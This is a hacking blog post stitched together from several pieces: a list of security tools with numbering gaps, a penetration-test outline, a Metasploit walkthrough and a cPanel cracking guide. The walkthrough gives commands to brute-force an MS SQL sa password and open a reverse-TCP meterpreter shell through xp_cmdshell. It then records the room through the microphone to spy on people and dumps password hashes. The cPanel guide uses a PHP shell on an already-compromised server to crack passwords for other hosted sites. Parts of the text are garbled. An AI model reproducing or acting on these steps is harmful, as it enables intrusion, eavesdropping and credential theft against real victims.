Saturday, 10 January 2015

Here is the List of tools that ethical HACKER must have a range of systems. These tools are basically to reveal information which further results in a specific attacks on a given system. To locate weaknesses or error in a target system to gain as muchas information as possible about that network.

2 – Wireshark:

This is very powerful tool for analysis and network troubleshooting. Wireshark is capable to view data from Live networking. It support media formats and hundreds of protocols. It is also used for development and education. Most Unix vendors and Linux supply their own Wireshark packages.

.

3 – Cain & Able:

This tool is proven it’s self revolutionary in cyber mafia. It is capable of cracking passwords, several password retrieval jobs, routing/analyzing protocols and sniffing networks. Unlikly most of the tools it is just windows-only and is a twist to forensic tools & modern penetration testing.

.

.

4 – MetaSploit:

MetaSploit is powerful network analysis and security tool. It is mostly used for penetration attacks because of it’s easily gathering information of victim and clean-interfacing technique.

.

5 – Ettercap:

It is used for Man in the middle attack (MITM), these attacks are on Local area networks. It sniffs live connections & also got content filtering techniques. It has many features of host analysis and networking while it supports both active and passive dissections of various protocols.

.

6 – Nessus:

7 – Havij:

Havij is most used testing tool for SQL injection and many other injections. It has features of database retrieval, site’s scanning, password cracking and admin look-up. Basic purpose of it is to find vulnerable websites and breeze to hack.

.

8 – Kismet:

Kismet is 802.11 layer2 sniffer, wireless network detector and intrusion detection system. It supports every wireless card and can work with any appropriate hardware on raw monitoring (rfmon) mode. Kismet supports plugin that can sniff media such as DECT. It can sniff 802.11a, 802.11n, 802.11b, sniff802.11g and traffic.

.

9 – BackTrack Linux:

Backtrack is most popular and widely used tool bootable on CD of Linux Distro. It has got a large variety of penetration testing tools, VOIP networks, network attacks and many more testing/attacking of websites and systems. This tool is most user friendly because of its helpful and useful layout.

.

.

10 – W3af:

W3af also known as web-focused Metasploit is an extremely flexible, popular, powerful & framework for finding vulnerabilities in exploiting web application. It’s vast features got dozens of exploitation and web assessment plugins.

.

11 – Encase:

EnCase is computer forensics software mostly used by law enforcement agencies. Because of it’s vast usage and popularity it is forensics in a a de-facto standard. This tool is being made to gather data from a computer in a forensically sound manner.

.

12 – Helix:

13 – Acunetix:

Acunetix is Strong tool in website security purpose. It has variety of features for testing a website for various injections. Acunetix WVS basically checks the vulnerabilities of website, either XSS, SQL or other Injection are possible or not.

.

14 – Burp Suite:

This tool is designed for performing testing regarding security of web applications. It is an integrated platform and got various tools working togather to make a complete testing process. This tools is also used for exploiting security vulnerabilities & analysis of application attack surface from initial mapping.

.

.

The Penetration Test Process

Discovery: The process Penetration tests is a Discovery in variety of techniques e.g scan utilities, databases, Google data & much more to get as much information about the target as possible. These discoveries are basically to reveal sensitive information which further results in a specific attacks on a given system.

Enumeration: After discovery of systems and specific networks the next step is to gain as much as information as possible about that network. The diffrence b/w Discovery & Enumeration depends upon state of intrusion. Enumeration task is to get reletive information about username while software and hardware version information are also obtained form it.

Vulnerability Identification: This is most important step in penetration testing. In vulnerability identification you have to locate the week spot of target system. To locate weaknesses or error in a target system is must needed because after that you will get to know where to launch an attack.

Exploitation and Launching of Attacks: After vulnerability has been located and you have identified the target’s weekspot now it is possible to launch the exploits. The main purpose of launching exploits is to get full access on victims’s system.

Denial of Service: This term is known as dDos (Denial of Service). This is used to check the stability of the systems either it is crashed or not. It is good habit to check the strenght or stability of a system, before the real environment attack is being made.

Reporting: This is just for educational purpose. Now after you have completed penetration test it is recomended to get user customized for technical overview, This includes detailed recommendations, executive summary, identified vulnerabilities & other security ID numbers. These reports may be in various forms i.e pdf, html, xml etc. while every report must be modified by user’s choice.

In this tutorial, we'll look at how we can crack the password on the system admin (sa) account on the database, install a meterpreter payload through calling the stored procedure xp_cmdshell, and wreak havoc on their system.

Step 1: Start Metasploit

First, we need to start Metasploit.
Once we have the metasploit command prompt, we need to define which module we want to use. In past Metasploit tutorials, we've always used exploits, but this one is a bit different. Instead, we will use a scanner among the auxiliary modules that enables us to brute force the sa password. Let's load up mssql_login:

use scanner/mssql/mssql_login

As
you can see, Metasploit responds by telling us we have successfully
loaded this auxiliary

module. Now let's take a look at the options with
this module.

show options

Step 2: Set Your Options

In order to run this MS SQL login module, we will need:

A password file,

Set the RHOSTS, and

Determine the number of THREADS we want to run.

BackTrack has a wordlist specially built for MS SQL password hacking with over 57,000 commonly used SQL passwords at /pentest/exploits/fasttrack/bin/wordlist.txt. In this case, our target is at 192.168.1.103, and we will set our THREADS to 20.

Step 3: Brute Force the Database Passwords

Now, we simply need to type exploit and it runs through password list until it finds the password for the sa account.

exploit

As
you can see, after testing over 57,000 passwords (it takes a few
minutes, so be patient), it found the password on our sa account of
"NullByte". Success! Now we have full sysadmin privileges on the database that we can hopefully convert to full system sysadmin privileges.

Step 4: Grab the xp__cmdshell

Now that we have
full sysadmin (sa) on the MS SQL database, we are going to leverage that to full system sysadmin privileges. MS SQL Server has a stored
procedure named xp_cmdshell that enables the sa account
to gain a system command shell with full system admin rights. If we can
invoke that command shell, we may be able to load the payload of our
choice on the system and own that system.
Metasploit has a exploit module named windows/mssql/mssqlpayload that attempts to do this. Let's load it.

use windows/mssql/mssql_payload

Now, let's check the options for this exploit:

show options

In this case, we will try to load the meterpreter on this system, so let's:

set PAYLOAD windows/meterpreter/reverse_tcp

In
addition, we need to set the LPORT, the LHOST, the RHOST and the
password we recovered from the sa account from above, in this case,
"NullByte".

Now, simply type exploit and if all is right with the world, we should get a meterpreter prompt.

Success! We have a meterpreter session!

Step 5: Wreak Havoc!

Now that we have the meterpreter on this system thanks to the xp_cmdshell stored procedure, we can begin to wreak havoc on this system. Take a look at my list of meterpreter scripts and let's try a few.
First,
let's turn on the microphone and listen in on the conversations of the
sysadmin and anyone else in the room. Think of it as installing a bug in
the room from the old James Bond 007 movies.

meterpreter > run sound_recorder -i 100 -l /etc

This will grab 100 segments of audio of 30 seconds, or about 50 minutes, and save it in the /etcdirectory. Of course, we can record as much audio as we want. We are only limited by hard drive space.

Step 6: Grab the Hash

Now, let's grab some
passwords so that we can log back back in whenever we please. Remember,
once we have the admin password, we can login any time with Metasploit's psexec exploit.

meterpreter > hashdump

As you can see, we were able to grab the password hashes from the system
.

Please note that new meterpreter scripts are being developed
every day. This list attempts to provide you with a complete list of
scripts as of this writing. If you find errors or typos, please feel
free to post them here, so I will try correct them as soon as humanly
possible.

Script Commands with Brief Descriptions

arp_scanner.rb - Script for performing an ARP's Scan Discovery.

autoroute.rb - Meterpreter session without having to background the current session.

checkvm.rb - Script for detecting if target host is a virtual machine.

credcollect.rb - Script to harvest credentials found on the host and store them in the database.

duplicate.rb
- Uses a meterpreter session to spawn a new meterpreter session in a
different process. A new process allows the session to take "risky"
actions that might get the process killed by A/V, giving a meterpreter
session to another controller, or start a keylogger on another process.

enum_chrome.rb - Script to extract data from a chrome installation.

enum_firefox.rb - Script for extracting data from Firefox. enum_logged_on_users.rb - Script for enumerating current logged users and users that have logged in to the system. enum_powershell_env.rb - Enumerates PowerShell and WSH configurations.

enum_putty.rb - Enumerates Putty connections.

enum_shares.rb - Script for Enumerating shares offered and history of mounted shares.

event_manager.rb - Show information about Event Logs on the target system and their configuration.

file_collector.rb - Script for searching and downloading files that match a specific pattern.

get_application_list.rb - Script for extracting a list of installed applications and their version.

getcountermeasure.rb
- Script for detecting AV, HIPS, Third Party Firewalls, DEP
Configuration and Windows Firewall configuration. Provides also the
option to kill the processes of detected products and disable the
built-in firewall.

get_env.rb - Script for extracting a list of all System and User environment variables.

getfilezillacreds.rb - Script for extracting servers and credentials from Filezilla.

getgui.rb - Script to enable Windows RDP.

get_local_subnets.rb - Get a list of local subnets based on the host's routes.

multi_meter_inject.rb
- Script for injecting a reverce tcp Meterpreter Payload into memory of
multiple PIDs, if none is provided a notepad process will be created
and a Meterpreter Payload will be injected in to each.

panda2007pavsrv51.rb
- This module exploits a privilege escalation vulnerability in Panda
Antivirus 2007. Due to insecure permission issues, a local attacker can
gain elevated privileges.

persistence.rb - Script for creating a persistent backdoor on a target host.

pml_driver_config.rb
- Exploits a privilege escalation vulnerability in Hewlett-Packard's
PML Driver HPZ12. Due to an insecure SERVICE_CHANGE_CONFIG DACL
permission, a local attacker can gain elevated privileges.

powerdump.rb
- Meterpreter script for utilizing purely PowerShell to extract
username and password hashes through registry keys. This script requires
you to be running as system in order to work properly. This has
currently been tested on Server 2008 and Windows 7, which installs
PowerShell by default.

process_memdump.rb - Script is based on the paper Neurosurgery With Meterpreter.

remotewinenum.rb
- This script will enumerate windows hosts in the target environment
given a username and password or using the credential under which
Meterpeter is running using WMI wmic windows native tool.

scheduleme.rb
- Script for automating the most common scheduling tasks during a
pentest. This script works with Windows XP, Windows 2003, Windows Vista
and Windows 2008.

schtasksabuse.rb
- Meterpreter script for abusing the scheduler service in Windows by
scheduling and running a list of command against one or more targets.
Using schtasks command to run them as system. This script works with
Windows XP, Windows 2003, Windows Vista and Windows 2008.

scraper.rb - The goal of this script is to obtain system information from a victim through an existing Meterpreter session.

screenspy.rb - This script will open an interactive view of remote hosts. You will need Firefox installed on your machine.

screen_unlock.rb - Script to unlock a windows screen. Needs system privileges to run and known signatures for the target system.

screen_dwld.rb - Script that recursively search and download files matching a given pattern.

service_manager.rb - Script for managing Windows services.

service_permissions_escalate.rb
This script attempts to create a service, then searches through a list
of existing services to look for insecure file or configuration
permissions that will let it replace the executable with a payload. It
will then attempt to restart the replaced service to run the payload. If
that fails, the next time the service is started (such as on reboot)
the attacker will gain elevated privileges.

sound_recorder.rb - Script for recording in intervals the sound capture by a target host microphone.

srt_webdrive_priv.rb - Exploits a privilege escalation vulnerability in South River Technologies WebDrive.

Today we will
Learn CPANEL cracking or Hacking i.e gaining password for port no 2082
on website first of all we need a cpanel cracking shell on the server
because we are going to crack those websites cpanels which are hosted on
the shelled server.

so lets start i am using cpanel.php [download it here]shell
for cracking :) we need two things in cracking first one is usernames
of the websites that are hosted on the server second is a good password
dictonery [Get Passwords List Here]

so

in first step :-
grab the usernames of the websites using command ls /var/mail
or use the "Grab the usernames from /etc/passwd" option in the shell

press the go button
we have done from our side
lets wait and watch ,if we have supplied good passwords then shell will show a message
" [~]# cracking success with username "xyz" with password "xyz" "
otherwise it will show
"[~] Please put some good passwords to crack username "xyz" :( "

so chances of success depends on password list that we are using in cracking process

Disclaimer

ALL INFORMATION / TUTORIALS WRITTEN ON HACKERSAUTHORITY.BLOGSPOT.COM ARE FOR EDUCATIONAL PURPOSES ONLY, THE SITE hackersauthority.blogspot.com IS NOT RESPONSIBLE IN ANY WAY FOR HOW THIS INFORMATION IS USED, YOU USE IT AT YOUR OWN RISK. YOU MAY LEARN ALSO HOW TO GET YOUR OWN ACCOUNT BACK FROM ALL THIS INFRORMATION.